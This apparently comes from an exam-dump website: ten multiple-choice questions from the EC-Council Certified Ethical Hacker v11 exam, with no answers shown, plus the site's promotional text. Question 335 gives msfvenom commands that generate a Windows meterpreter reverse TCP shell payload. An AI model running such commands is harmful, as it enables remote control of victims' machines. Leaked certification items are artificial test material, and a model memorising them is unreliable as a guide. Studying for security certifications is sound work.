312-50V11 Exam Details

  • Exam Code
    :312-50V11
  • Exam Name
    :EC-Council Certified Ethical Hacker (C|EH v11)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :528 Q&As
  • Last Updated
    :May 28, 2026

EC-COUNCIL 312-50V11 Online Questions & Answers

  • Question 331:

    Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server publishing"?

    A. Overloading Port Address Translation
    B. Dynamic Port Address Translation
    C. Dynamic Network Address Translation
    D. Static Network Address Translation

  • Question 332:

    Which of the following Linux commands will resolve a domain name into IP address?

    A. >host-t a hackeddomain.com
    B. >host-t ns hackeddomain.com
    C. >host -t soa hackeddomain.com
    D. >host -t AXFR hackeddomain.com

  • Question 333:

    Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days. Sieve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario?

    A. Diversion theft
    B. Baiting
    C. Honey trap
    D. Piggybacking

  • Question 334:

    A "Server-Side Includes" attack refers to the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely. Which web-page file type, if it exists on the web server, is a strong indication that the server is vulnerable to this kind of attack?

    A. .stm
    B. .html
    C. .rss
    D. .cms

  • Question 335:

    what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

    A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
    B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
    C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
    D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  • Question 336:

    Which of the following programs is usually targeted at Microsoft Office products?

    A. Polymorphic virus
    B. Multipart virus
    C. Macro virus
    D. Stealth virus

  • Question 337:

    Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a countermeasures to secure the accounts on the web server.

    Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

    A. Enable unused default user accounts created during the installation of an OS
    B. Enable all non-interactive accounts that should exist but do not require interactive login
    C. Limit the administrator or toot-level access to the minimum number of users
    D. Retain all unused modules and application extensions

  • Question 338:

    When a security analyst prepares for the formal security assessment - what of the following should be done in order to determine inconsistencies in the secure assets database and verify that system is compliant to the minimum security baseline?

    A. Data items and vulnerability scanning
    B. Interviewing employees and network engineers
    C. Reviewing the firewalls configuration
    D. Source code review

  • Question 339:

    Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfilltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs, what type of malware did the attacker use to bypass the company's application whitelisting?

    A. Phishing malware
    B. Zero-day malware
    C. File-less malware
    D. Logic bomb malware

  • Question 340:

    Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two. What would you call this attack?

    A. Interceptor
    B. Man-in-the-middle
    C. ARP Proxy
    D. Poisoning Attack

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-50V11 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.